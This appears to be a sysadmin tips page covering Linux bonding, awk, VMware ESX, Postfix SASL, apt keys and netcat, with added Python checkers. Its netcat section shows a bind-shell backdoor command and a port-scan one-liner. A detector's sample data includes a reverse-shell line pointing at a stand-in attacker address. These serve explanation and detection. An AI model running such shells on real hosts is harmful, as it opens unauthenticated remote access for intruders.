Linux Ethernet Bonding

Bonding (also called link aggregation or NIC teaming) lets you group several physical Ethernet ports into one logical interface. Depending on the mode, that gives you more aggregate bandwidth, fail-over when a link dies, or both. For example, three 1 Gbit/s ports can be aggregated into a single 3 Gbit/s trunk. Keep in mind that this is aggregate capacity: except in balance-rr, which stripes packets across the links (and can therefore deliver them out of order), a single TCP flow is hashed onto one slave and still sees at most one link's speed.
Use it wherever you need redundant links, fault tolerance or load balancing. Combined with 802.1q VLAN tagging on top of the bond (your switches must support 802.1q) it is a common way to build a highly available network segment.

In order to configure Ethernet bonding, the kernel must have the bonding module available:

# modprobe --list | grep bonding

(modprobe --list was dropped from kmod-based distributions; there, use modinfo bonding instead. The ifconfig and ifenslave commands below are likewise legacy tools: on current systems the same job is done with iproute2, i.e. ip link add bond0 type bond, then ip link set eth0 master bond0.)


Then:

# modprobe bonding mode=0 miimon=50           # load the bonding module (round-robin, check link state every 50 ms)
# ifconfig eth0 down                           # take eth0 down
# ifconfig eth1 down                           # take eth1 down
# ifconfig bond0 hw ether 00:12:34:56:78:90    # set the MAC address of the bond0 interface
# ifconfig bond0 up                            # bond0 must be up (normally with its IP address configured) before slaves can be added
# ifenslave bond0 eth0 eth1                    # enslave eth0 and eth1 to bond0

Now you can check the result by entering this command:

# cat /proc/net/bonding/bond0

Ethernet Channel Bonding Driver: v3.2.5 (March 21, 2008)

Bonding Mode: load balancing (round-robin)
MII Status: up
MII Polling Interval (ms): 50
Up Delay (ms): 0
Down Delay (ms): 0

Slave Interface: eth0
MII Status: up
Link Failure Count: 1
Permanent HW addr: 08:00:27:d7:a8:cb

Slave Interface: eth1
MII Status: up
Link Failure Count: 1
Permanent HW addr: 08:00:27:a9:e3:bf
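The status file above is what you poll to know whether a bond is actually redundant, not just configured. The following is an example added here, not code from the original page or from the bonding driver: it parses the text of /proc/net/bonding/bondX (only the field names shown above, plus the "Currently Active Slave:" line that active-backup bonds print) and reports anything that means the bond is degraded. The two sample status files are constructed; the second one assumes an active-backup bond whose backup link has dropped.

```python
"""Parse /proc/net/bonding/<bond> and flag a degraded bond.

Example added here, not from the original page.  It relies only on the
field names in the status output shown above plus the "Currently Active
Slave:" line that the driver prints for active-backup bonds.
"""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Slave:
    name: str
    mii_up: bool = False
    link_failures: int = 0
    hwaddr: str = ""


@dataclass
class BondStatus:
    mode: str = ""
    mii_up: bool = False
    active_slave: Optional[str] = None
    slaves: List[Slave] = field(default_factory=list)

    def problems(self) -> List[str]:
        """Human-readable findings; an empty list means the bond is healthy."""
        out = []
        if not self.mii_up:
            out.append("bond MII status is down")
        out += [f"slave {s.name} is down" for s in self.slaves if not s.mii_up]
        if "active-backup" in self.mode and self.active_slave is None:
            out.append("active-backup bond has no active slave")
        if len(self.slaves) < 2:
            out.append("fewer than two slaves: no redundancy")
        return out


def parse_bond(text: str) -> BondStatus:
    """Lines before the first 'Slave Interface:' describe the bond itself;
    every 'Slave Interface:' line starts a new per-slave block."""
    bond = BondStatus()
    current: Optional[Slave] = None
    for raw in text.splitlines():
        if ":" not in raw:
            continue
        key, value = (part.strip() for part in raw.split(":", 1))
        if key == "Slave Interface":
            current = Slave(name=value)
            bond.slaves.append(current)
        elif key == "Bonding Mode":
            bond.mode = value
        elif key == "Currently Active Slave":
            bond.active_slave = None if value == "None" else value
        elif key == "MII Status":            # first one is the bond, later ones per slave
            if current is None:
                bond.mii_up = value == "up"
            else:
                current.mii_up = value == "up"
        elif key == "Link Failure Count" and current is not None:
            current.link_failures = int(value)
        elif key == "Permanent HW addr" and current is not None:
            current.hwaddr = value
    return bond


def check_file(path: str) -> List[str]:
    """Check a real status file, e.g. /proc/net/bonding/bond0."""
    with open(path) as fh:
        return parse_bond(fh.read()).problems()


# Constructed sample with the same shape as the output above: a healthy round-robin bond.
HEALTHY = """\
Bonding Mode: load balancing (round-robin)
MII Status: up
MII Polling Interval (ms): 50

Slave Interface: eth0
MII Status: up
Link Failure Count: 1
Permanent HW addr: 08:00:27:d7:a8:cb

Slave Interface: eth1
MII Status: up
Link Failure Count: 1
Permanent HW addr: 08:00:27:a9:e3:bf
"""

# Constructed sample: an active-backup bond whose backup link has dropped.
DEGRADED = """\
Bonding Mode: fault-tolerance (active-backup)
Primary Slave: None
Currently Active Slave: eth0
MII Status: up

Slave Interface: eth0
MII Status: up
Link Failure Count: 0
Permanent HW addr: 08:00:27:d7:a8:cb

Slave Interface: eth1
MII Status: down
Link Failure Count: 3
Permanent HW addr: 08:00:27:a9:e3:bf
"""

if __name__ == "__main__":
    import sys
    findings = check_file(sys.argv[1]) if len(sys.argv) > 1 else parse_bond(DEGRADED).problems()
    for finding in findings:
        print("WARNING:", finding)
    sys.exit(1 if findings else 0)
```

Run it as a cron job or monitoring check with the real path as its argument; the exit status is non-zero whenever a slave is down, which is the condition that silently turns a redundant bond into a single point of failure. A rising link_failures count on one slave with nothing else wrong is the classic sign of a flapping cable or switch port.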

You can set up your bond interface according to your needs. Changing one parameter (mode=X) gives you the following bonding types:
mode=0 (balance-rr)
Round-robin policy: Transmit packets in sequential order from the first available slave through the last. This mode provides load balancing and fault tolerance.

mode=1 (active-backup)
Active-backup policy: Only one slave in the bond is active. A different slave becomes active if, and only if, the active slave fails. The bond’s MAC address is externally visible on only one port (network adapter) to avoid confusing the switch. This mode provides fault tolerance. The primary option affects the behavior of this mode.

mode=2 (balance-xor)
XOR policy: Transmit based on [(source MAC address XOR'd with destination MAC address) modulo slave count]. This selects the same slave for each destination MAC address. This mode provides load balancing and fault tolerance. Which header fields feed the hash is controlled by the xmit_hash_policy parameter; the default (layer2) is the MAC-based rule described here, so all traffic to one destination MAC, e.g. the default gateway, lands on a single slave.

mode=3 (broadcast)
Broadcast policy: transmits everything on all slave interfaces. This mode provides fault tolerance.

mode=4 (802.3ad)
IEEE 802.3ad Dynamic link aggregation (LACP). Creates aggregation groups that share the same speed and duplex settings. Utilizes all slaves in the active aggregator according to the 802.3ad specification. As with balance-xor, the slave used for a given frame is chosen by xmit_hash_policy, so one flow never exceeds one link's speed.

Prerequisites:
1. Ethtool support in the base drivers for retrieving the speed and duplex of each slave.
2. A switch that supports IEEE 802.3ad Dynamic link aggregation. Most switches will require some type of configuration to enable 802.3ad mode.

mode=5 (balance-tlb)
Adaptive transmit load balancing: channel bonding that does not require any special switch support. The outgoing traffic is distributed according to the current load (computed relative to the speed) on each slave. Incoming traffic is received by the current slave. If the receiving slave fails, another slave takes over the MAC address of the failed receiving slave.

Prerequisite: ethtool support in the base drivers for retrieving the speed of each slave.

mode=6 (balance-alb)
Adaptive load balancing: includes balance-tlb plus receive load balancing (rlb) for IPv4 traffic, and does not require any special switch support. The receive load balancing is achieved by ARP negotiation. The bonding driver intercepts the ARP Replies sent by the local system on their way out and overwrites the source hardware address with the unique hardware address of one of the slaves in the bond such that different peers use different hardware addresses for the server. Besides ethtool speed reporting, this mode requires that the slave drivers support changing the hardware address while the device is open.

In practice, modes 0, 1, 2 and 4 are the ones most commonly deployed.

For more information, refer to the bonding driver documentation that ships with the kernel source (Documentation/networking/bonding.txt), from which the mode descriptions above are taken.

Sum using awk

Sum a column of file sizes from ls -l output using awk (the fifth column is the size in bytes, so the result is printed in MiB):

# ls -l *.iso | awk '{ SUM += $5} END { print SUM/1024/1024 }'

The command below shows the memory used by Apache by summing the RSS column (field 8 with ps -y -l, in KiB) of every httpd process and printing MiB. Note that RSS counts pages shared between the pre-forked workers once per process, so the total over-states real usage:

# ps -ylC httpd --sort=rss | awk '{ SUM += $8 } END { print SUM/1024 }'

VMware ESX, killing a virtual machine that won’t die !

Sometimes VirtualCenter won't do the job: your virtual machine has hung and you need to kill it. Here are two ways to kill the VM from within the service console:

1. The vmware-cmd command

* Log on to the service console and run vmware-cmd /vmfs/volumes/<datastore UUID>/<vm>/<vm>.vmx stop. You must use the datastore's UUID path, not the friendly datastore name. If you need the location of all VMs, vmware-cmd -l lists every registered VM with the path to its .vmx file.
* If that fails, try the hard option, vmware-cmd /vmfs/volumes/<datastore UUID>/<vm>/<vm>.vmx stop hard. This powers the VM off without a guest shutdown, the equivalent of pulling the plug.

2. Kill the process by PID

* Run ps auxfww | grep <vm name> to locate the vmware-vmx process of the virtual machine; the first number in the output is the VM's PID. Use that PID to terminate the process with kill -9 <PID>. This is a last resort: the guest gets no chance to flush anything, and a killed vmx process may leave stale lock files on the datastore that you have to clean up before the VM powers on again.

SMTP Auth – Postfix and SASL (Debian)

# apt-get install sasl2-bin libsasl2 libsasl2-modules

Now edit /etc/default/saslauthd and make sure the daemon is enabled there (START=yes), otherwise invoke-rc.d saslauthd start will do nothing.

Now we should create /etc/postfix/sasl/smtpd.conf:

pwcheck_method: saslauthd
mech_list: PLAIN LOGIN

Both PLAIN and LOGIN send the password base64-encoded, not encrypted, so they are only acceptable inside a TLS session.

Ok, let's add some lines to /etc/postfix/main.cf to enable SASL:

smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous

smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination

Restrictions are evaluated left to right and the first match wins: authenticated clients and hosts in mynetworks may relay, everyone else is limited to your own domains by reject_unauth_destination. Leave that last rule out and the server is an open relay. Once TLS is configured, also add smtpd_tls_auth_only = yes so that AUTH is only offered after STARTTLS.

Postfix's smtpd runs chrooted under /var/spool/postfix, so it cannot reach the saslauthd socket at its default location /var/run/saslauthd. This is the tricky part: move the socket directory inside the chroot and let the postfix user reach it:

# rm -r /var/run/saslauthd/
# mkdir -p /var/spool/postfix/var/run/saslauthd
# ln -s /var/spool/postfix/var/run/saslauthd /var/run
# chgrp sasl /var/spool/postfix/var/run/saslauthd
# adduser postfix sasl

(The Debian package offers the same result without the symlink: set OPTIONS="-c -m /var/spool/postfix/var/run/saslauthd" in /etc/default/saslauthd so that saslauthd creates its socket inside the chroot.)

Now restart postfix and start saslauthd

# invoke-rc.d postfix restart
# invoke-rc.d saslauthd start
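After restarting, it is worth checking main.cf for the two mistakes that make SASL setups dangerous: offering PLAIN/LOGIN without requiring TLS, and getting the relay restrictions wrong. The following is an example added here, not part of the original page or of Postfix: a small auditor that parses main.cf syntax (including continuation lines) and flags those problems. The three embedded configurations are constructed samples; the first repeats the settings given above as written, the second is the hardened version, the third is a classic open relay. The relay check only trusts what is written in the file, so on Postfix 2.10 or later, which ships a safe default for smtpd_relay_restrictions, it is deliberately conservative.

```python
"""Audit a Postfix main.cf for the SASL and relay mistakes discussed above.

Example added here, not part of the original page.  It reads main.cf syntax
(name = value, '#' comment lines, continuation lines that start with
whitespace) and reports:
  * SASL enabled without smtpd_tls_auth_only = yes (PLAIN/LOGIN in clear text)
  * smtpd_sasl_security_options missing noanonymous
  * an open relay: no reject_unauth_destination (or defer_unauth_destination)
    before a blanket "permit" in either smtpd_relay_restrictions or
    smtpd_recipient_restrictions
"""
import re
from typing import Dict, List


def parse_main_cf(text: str) -> Dict[str, str]:
    params: Dict[str, str] = {}
    current = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        if line[0].isspace() and current is not None:   # continuation line
            params[current] += " " + line.strip()
            continue
        if "=" not in line:
            continue
        name, value = line.split("=", 1)
        current = name.strip()
        params[current] = value.strip()
    return params


def split_list(value: str) -> List[str]:
    """Postfix list parameters are separated by commas and/or whitespace."""
    return [item for item in re.split(r"[,\s]+", value) if item]


def relay_guarded(rules: List[str]) -> bool:
    """True if the list rejects unauthorised relaying before any blanket permit."""
    for rule in rules:
        if rule in ("reject_unauth_destination", "defer_unauth_destination"):
            return True
        if rule == "permit":
            return False
    return False


def audit(params: Dict[str, str]) -> List[str]:
    findings: List[str] = []

    def is_yes(name: str) -> bool:
        return params.get(name, "no").strip().lower() == "yes"

    if is_yes("smtpd_sasl_auth_enable"):
        if not is_yes("smtpd_tls_auth_only"):
            findings.append("smtpd_tls_auth_only is not 'yes': PLAIN/LOGIN "
                            "passwords can be sent without TLS")
        if "noanonymous" not in split_list(params.get("smtpd_sasl_security_options", "")):
            findings.append("smtpd_sasl_security_options lacks noanonymous")

    # Restrictions are evaluated left to right, first match wins.
    lists = ("smtpd_relay_restrictions", "smtpd_recipient_restrictions")
    if not any(relay_guarded(split_list(params.get(name, ""))) for name in lists):
        findings.append("open relay: neither smtpd_relay_restrictions nor "
                        "smtpd_recipient_restrictions rejects unauthorised "
                        "destinations before a blanket permit")
    return findings


# Constructed sample: the settings exactly as given above (SASL on, TLS not required).
AS_ON_PAGE = """\
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
smtpd_recipient_restrictions = permit_sasl_authenticated,
    permit_mynetworks,
    reject_unauth_destination
"""

# Constructed sample: the same, hardened so that AUTH is only offered inside TLS.
HARDENED = AS_ON_PAGE + """\
smtpd_tls_security_level = may
smtpd_tls_auth_only = yes
smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
"""

# Constructed sample: a classic open relay ("permit" before the reject).
OPEN_RELAY = """\
# anyone may relay -- do not do this
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options =
smtpd_recipient_restrictions = permit, reject_unauth_destination
"""

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/postfix/main.cf"
    with open(path) as fh:
        for finding in audit(parse_main_cf(fh.read())):
            print("WARNING:", finding)
```

Running it against the configuration as given above reports exactly one finding, the missing smtpd_tls_auth_only; the same file with TLS-only AUTH and a relay restriction list passes clean.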

apt-get complain “The following signatures couldn’t be verified because the public key is not available”

If you happen to upgrade using apt-get and get the following error:

# apt-get update
Fetched 18.7kB in 3s (5301B/s)
Reading package lists... Done
W: GPG error: stable/non-US Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F1D53D8C4F368D5D
W: You may want to run apt-get update to correct these problems

It means that your APT does not have the public key that the Release file was signed with. In the example above, the long key ID of the missing key is F1D53D8C4F368D5D. To remedy the problem, fetch the key and hand it to apt-key. Be aware of what you are trusting here: a key ID is not proof of identity (short IDs are trivially forged and anyone can upload a key to a keyserver), and apt will accept packages signed by whatever you add. Compare the full fingerprint of the imported key with one published through a channel you already trust (for Debian, the debian-archive-keyring package or the fingerprints listed on debian.org) before running apt-key add:

# gpg --keyserver <keyserver> --recv-keys F1D53D8C4F368D5D
gpg: requesting key 4F368D5D from hkp server
gpg: key 4F368D5D: public key "Debian Archive Automatic Signing Key (2005) " imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg: imported: 1

# gpg --armor --export F1D53D8C4F368D5D | apt-key add -

(apt-key is deprecated in current apt releases: put the key in /etc/apt/trusted.gpg.d/ or, better, reference it for a single repository with the signed-by option in sources.list, so that the key cannot sign packages for any other source.)

Happy hacking ;)

Netcat: The TCP/IP Swiss army knife

Netcat is a full-featured networking utility which reads and writes data across network connections using TCP or UDP.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

In this little guide I'll quickly cover some very helpful uses of netcat. Note that there are several netcat implementations (traditional/GNU netcat, OpenBSD netcat, Nmap's ncat) with slightly different options; where they differ, both forms are shown.

Simple Chat:

The simplest example of netcat usage is to create a server-client chat system. In the following example the machine that creates the listening socket (the server) has the IP address <server-ip>. So, create the chat server on this machine and make it listen on TCP port 12345. With traditional netcat:

# nc -lp 12345

With OpenBSD netcat, which takes the port as a plain argument:

# nc -l 12345

If you now connect to port 12345 on that host, everything you type will be sent to the other party, which gives you a chat server.
Connect to it from another machine by entering this command:

# nc <server-ip> 12345

Now both parties can chat!

Port Scanner:

Netcat can be a port scanner. It does not have as many features as, say, nmap, but if you just want to see which of ports 1-1000 are open on a given machine, you can simply do (-z connects without sending data, -v reports each port, -w 1 sets a one-second timeout):

# nc -vzw 1 localhost 1-1000

Transferring Files:

Let's say you want to transfer a file from machine A to machine B. You can use netcat as file transfer software.
On machine A do the following, where 12345 is some unused port on which you want to serve the file (traditional netcat):

# nc -lp 12345 < myfile.tar.bz2

or, with OpenBSD netcat:

# nc -l 12345 < myfile.tar.bz2

then go to machine B and run this command (<machine-A-ip> is machine A's IP address):

# nc <machine-A-ip> 12345 > myfile.tar.bz2

Bear in mind that the listener hands the file to whoever connects first, there is no authentication, and nothing tells B whether the transfer completed or was altered in transit: compare a checksum (sha256sum) on both sides, and keep such transfers off untrusted networks.

Another example: stream a compressed tar archive of /etc straight over the wire. On the sending machine:

# tar -czf - /etc/ | nc -lp 12345

and then, on the receiving machine:

# nc <sender-ip> 12345 > mybackup.tar.gz
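To make the limitation of the raw netcat transfer concrete, here is an example added here, not code from the original page or from netcat: the same listener/receiver exchange written with sockets on the loopback interface, but with the minimum framing that lets the receiver detect a truncated or modified stream: an 8-byte length header, the payload, and a SHA-256 trailer. The payload is a constructed byte string; the tamper option flips one byte on the wire so the check can be exercised. It still does not authenticate either side: the listener serves whoever connects first, just like nc.

```python
"""Loopback file transfer with a length header and a SHA-256 trailer.

Example added here, not from the original page.  Bare "nc < file" / "nc > file"
gives the receiver no way to tell a complete, untampered stream from a
truncated or modified one.  This adds the minimum: an 8-byte big-endian
length, the payload, then the payload's SHA-256.  It still does not
authenticate anyone: the listener serves whoever connects first.
"""
import hashlib
import socket
import struct
import threading
from typing import Tuple

HEADER = struct.Struct("!Q")          # 8-byte big-endian payload length
DIGEST_SIZE = hashlib.sha256().digest_size


def serve_once(payload: bytes, tamper: bool = False) -> Tuple[int, threading.Thread]:
    """Bind an ephemeral loopback port and send the framed payload to the first
    client, then exit.  With tamper=True the last payload byte is flipped on
    the wire (the trailer is computed over the original) to exercise the check."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    body = bytearray(payload)
    if tamper and body:
        body[-1] ^= 0xFF

    def run() -> None:
        conn, _ = srv.accept()
        with srv, conn:
            conn.sendall(HEADER.pack(len(payload)) + bytes(body)
                         + hashlib.sha256(payload).digest())

    thread = threading.Thread(target=run, daemon=True)
    thread.start()
    return port, thread


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """recv() may return short reads; loop until n bytes or the peer closes."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError(f"stream ended after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)


def fetch(host: str, port: int) -> bytes:
    """Client side: read the frame and verify the trailer before returning data."""
    with socket.create_connection((host, port), timeout=5) as sock:
        (length,) = HEADER.unpack(recv_exact(sock, HEADER.size))
        payload = recv_exact(sock, length)
        digest = recv_exact(sock, DIGEST_SIZE)
    if hashlib.sha256(payload).digest() != digest:
        raise ValueError("SHA-256 mismatch: transfer truncated, corrupted or tampered")
    return payload


def transfer(payload: bytes, tamper: bool = False) -> bytes:
    """Round-trip payload through a loopback listener; raises on a bad transfer."""
    port, thread = serve_once(payload, tamper)
    try:
        return fetch("127.0.0.1", port)
    finally:
        thread.join(5)


if __name__ == "__main__":
    sample = bytes(range(256)) * 4096          # constructed 1 MiB payload
    assert transfer(sample) == sample
    print("clean transfer verified")
    try:
        transfer(sample, tamper=True)
    except ValueError as err:
        print("tampered transfer rejected:", err)
```

A plain "nc > file" would have written the tampered bytes and exited 0; here the receiver raises instead. For real use, wrap the connection in TLS or run it through ssh, which gives you the authentication this framing does not.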

Simple Single page Web Server:

# while true; do nc -lp 8080 -q 1 < test.html; done

Now if you connect to http://YOUR-IP-ADDRESS:8080 you will see the contents of test.html. Netcat sends the file with no HTTP headers at all, which browsers tolerate; -q 1 is the traditional-netcat option to close the connection one second after EOF on stdin.

Netcat as a Backdoor !!!

Netcat can be used as a backdoor. With the -e parameter you specify the shell (or, for that matter, any executable) that netcat should run on a successful connection, with its standard input and output wired to the socket:

# nc -lp 54321 -e /bin/bash

Now anyone who can reach port 54321 gets a shell as the user who started netcat, with no authentication whatsoever. That is exactly why the OpenBSD netcat omits -e, and why a listening nc with -e on a host you administer is a red flag worth investigating (run the other way round, with netcat connecting out to a waiting listener, the same option gives the well-known reverse shell).

Getting System Information

# while true; do nc -lp 12345 -e /usr/bin/uptime; done

The user who wants to obtain system information has to issue the following command (the listener runs uptime for each connection and sends its output back):

# nc <server-ip> 12345
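Both listeners in this section (the /bin/bash backdoor and the uptime service) look the same in a process list: a netcat binary with an exec option. The following is an example added here, not code from the original page or from netcat, of the detection side: it scans process listings in the format of ps -eo pid,user,args for netcat-family binaries that hand the connection to a program (-e, -c, --exec, --sh-exec, --lua-exec) and classifies each as a listener (bind shell) or an outbound connection (reverse shell), rating a real shell higher than some other program such as uptime. The sample listing is constructed and 203.0.113.7 is a documentation address standing in for an attacker host. It is a heuristic over command lines only: an OpenBSD netcat wired to a shell through a named pipe, for instance, will not be caught.

```python
"""Spot netcat bind shells and reverse shells in a process listing.

Example added here, not from the original page.  It scans lines in the
format of `ps -eo pid,user,args` (a constructed sample is embedded below)
for netcat-family binaries that hand a connection to a program through
-e / -c / --exec / --sh-exec / --lua-exec, and classifies each as a listener
(bind shell, like the -lp ... -e /bin/bash example above) or an outbound
connection (reverse shell).  Heuristic: it only sees the command line.
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional

NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
EXEC_LONG = ("--exec", "--sh-exec", "--lua-exec")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "cmd.exe", "powershell", "powershell.exe"}


@dataclass
class Finding:
    pid: int
    user: str
    kind: str       # "bind shell" (listener) or "reverse shell" (connects out)
    program: str    # what the socket is wired to
    severity: str   # "high" for a real shell, "medium" for any other program
    cmdline: str


def exec_target(argv: List[str]) -> Optional[str]:
    """Program netcat would spawn, or None if no exec-style option is present."""
    for i, arg in enumerate(argv[1:], start=1):
        if arg in EXEC_LONG:
            return argv[i + 1] if i + 1 < len(argv) else "?"
        for opt in EXEC_LONG:
            if arg.startswith(opt + "="):
                return arg[len(opt) + 1:]
        if len(arg) >= 2 and arg[0] == "-" and arg[1] != "-":
            if arg[-1] in "ec":                 # "-e", "-c", bundled "-lve": next arg
                return argv[i + 1] if i + 1 < len(argv) else "?"
            if arg[1] in "ec":                  # "-e/bin/sh": argument attached
                return arg[2:]
    return None


def is_listener(argv: List[str]) -> bool:
    """-l / --listen anywhere, including bundled short flags such as -lp or -lvp."""
    return any(arg == "--listen" or (arg.startswith("-") and not arg.startswith("--")
                                      and "l" in arg[1:]) for arg in argv[1:])


def scan_ps(ps_output: str) -> List[Finding]:
    findings: List[Finding] = []
    for line in ps_output.splitlines()[1:]:     # first line is the PID USER COMMAND header
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmdline = parts
        try:
            argv = shlex.split(cmdline)
        except ValueError:
            argv = cmdline.split()
        if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
            continue
        program = exec_target(argv)
        if program is None:
            continue                             # plain listener/client, not an exec shell
        kind = "bind shell" if is_listener(argv) else "reverse shell"
        severity = "high" if program.rsplit("/", 1)[-1] in SHELLS else "medium"
        findings.append(Finding(int(pid), user, kind, program, severity, cmdline))
    return findings


# Constructed sample `ps -eo pid,user,args` output.  203.0.113.7 is a
# documentation address standing in for an attacker's host.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  842 root     /usr/sbin/sshd -D
 1337 www-data nc -lp 54321 -e /bin/bash
 2048 nobody   /bin/sh -c while true; do nc -lp 12345 -e /usr/bin/uptime; done
 2051 nobody   nc -lp 12345 -e /usr/bin/uptime
 3101 backup   nc -l 12345
 4242 guest    ncat 203.0.113.7 4444 --sh-exec /bin/sh
 5001 alice    nc -vzw 1 localhost 1-1000
"""

if __name__ == "__main__":
    for f in scan_ps(SAMPLE_PS):
        print(f"[{f.severity}] pid {f.pid} ({f.user}): {f.kind} -> {f.program}: {f.cmdline}")
```

On the sample it flags the bash backdoor and the ncat reverse shell as high and the uptime listener as medium, while the plain file-transfer listener and the port scan pass untouched. In production, feed it the real ps output and correlate the PIDs with ss -ltnp, since a renamed binary defeats the name check.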